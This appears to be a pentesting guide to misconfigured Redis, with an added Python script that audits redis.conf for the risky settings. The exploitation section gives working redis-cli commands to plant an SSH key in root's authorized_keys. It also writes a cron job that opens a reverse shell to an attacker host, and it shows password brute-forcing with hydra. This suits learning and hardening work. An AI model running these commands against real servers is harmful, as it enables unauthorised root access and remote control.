Redis is an in-memory key-value store commonly used for caching and message brokering. It typically runs on TCP port 6379. When misconfigured, Redis can expose sensitive data, allow unauthorized access, or even lead to remote code execution (RCE) or persistence via SSH key injection.


1. Port Scanning & Detection

Nmap Scan

nmap -p 6379 --script redis-info <target>

Checks if Redis is running and gathers basic info.

Banner Grabbing

nc <target> 6379

Then type:

INFO

2. Connecting to Redis (Unauthenticated)

Using redis-cli

redis-cli -h <target> -p 6379

Opens an interactive session for basic interaction.

List All Keys

KEYS *

Get Value of a Key

GET <key>

3. Exploitation Scenarios

Privilege Escalation via SSH Key Injection

If Redis runs as root and accepts CONFIG SET and SAVE from the client, the dump file can be redirected into root's authorized_keys:

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > pub.txt
cat pub.txt | redis-cli -h <target> -x set crackit
redis-cli -h <target> config set dir /root/.ssh/
redis-cli -h <target> config set dbfilename "authorized_keys"
redis-cli -h <target> save

Then SSH into the server using your private key.

RCE via Cron (if writable dir)

echo -e "* * * * * bash -i >& /dev/tcp/attacker_ip/4444 0>&1" > cron.txt
cat cron.txt | redis-cli -h <target> -x set cronjob
redis-cli -h <target> config set dir /var/spool/cron/
redis-cli -h <target> config set dbfilename root
redis-cli -h <target> save

Establishes a reverse shell through cron.


4. Authentication Bypass / Info Leak

Check for Auth Requirement

redis-cli -h <target> info

If the command returns server information instead of a NOAUTH error, requirepass is not set and no password is needed.

Brute-Force Redis Password

hydra -s 6379 -P wordlist.txt <target> redis

Authenticated Connection

redis-cli -h <target> -a <password>

5. Useful Commands

Command              Description
INFO                 Shows server stats
CONFIG GET *         Dumps configuration
FLUSHALL             Deletes all keys
KEYS *               Lists all keys
GET <key>            Retrieves value of a key
SET <key> <value>    Sets a key to a value
SAVE                 Saves current state to disk
CONFIG SET           Changes Redis settings (e.g., path)

Conclusion

Redis misconfigurations can lead to significant security issues, from unauthorized data access to remote command execution. Proper configuration, access control, and regular audits are key to securing Redis deployments.
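
An added example, not from the original post: a Python audit of a redis.conf for the settings the scenarios above depend on (no requirepass, Redis reachable beyond loopback, CONFIG SET able to repoint dir and dbfilename). The finding names and both sample configs are constructed for illustration; ACL users and aclfile are not evaluated, and enable-protected-configs exists only in Redis 7.0 and later.

```python
import ipaddress
import shlex

def parse_redis_conf(text):
    """Parse redis.conf text into {directive: [argument lists]}, names lowercased."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):    # only whole-line comments exist
            continue
        parts = shlex.split(line)               # arguments may be quoted
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def setting(conf, name, default=""):
    """First argument of the last occurrence of a directive, lowercased."""
    args = conf.get(name, [[default]])[-1]
    return args[0].lower() if args else default

def is_loopback(addr):
    try:
        return ipaddress.ip_address(addr.lstrip("-")).is_loopback  # "-::1" form
    except ValueError:                          # "*" or a hostname: reachable
        return False

def audit(text):
    """Return finding ids (names chosen here) for settings the page's scenarios need."""
    conf, findings = parse_redis_conf(text), []
    if not setting(conf, "requirepass"):
        findings.append("no-requirepass")
    if setting(conf, "protected-mode", "yes") == "no":
        findings.append("protected-mode-off")
    binds = conf.get("bind", [[]])[-1]          # no bind line means all interfaces
    if not binds or not all(is_loopback(a) for a in binds):
        findings.append("non-loopback-bind")
    if setting(conf, "enable-protected-configs", "no") == "yes":
        findings.append("protected-configs-writable")  # dir/dbfilename settable
    renamed = {a[0].lower() for a in conf.get("rename-command", []) if a}
    if "config" not in renamed:
        findings.append("config-command-exposed")      # matters most before 7.0
    return findings

# Constructed configs for illustration; the password is a placeholder.
WEAK = "bind 0.0.0.0\nprotected-mode no\nenable-protected-configs yes\n"
HARDENED = ("bind 127.0.0.1 -::1\nprotected-mode yes\n"
            'requirepass "<long-random-secret>"\nrename-command CONFIG ""\n')
```

audit(WEAK) returns all five findings and audit(HARDENED) returns none; running Redis as a dedicated non-root user is set in the service unit rather than redis.conf, so it has to be checked separately.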

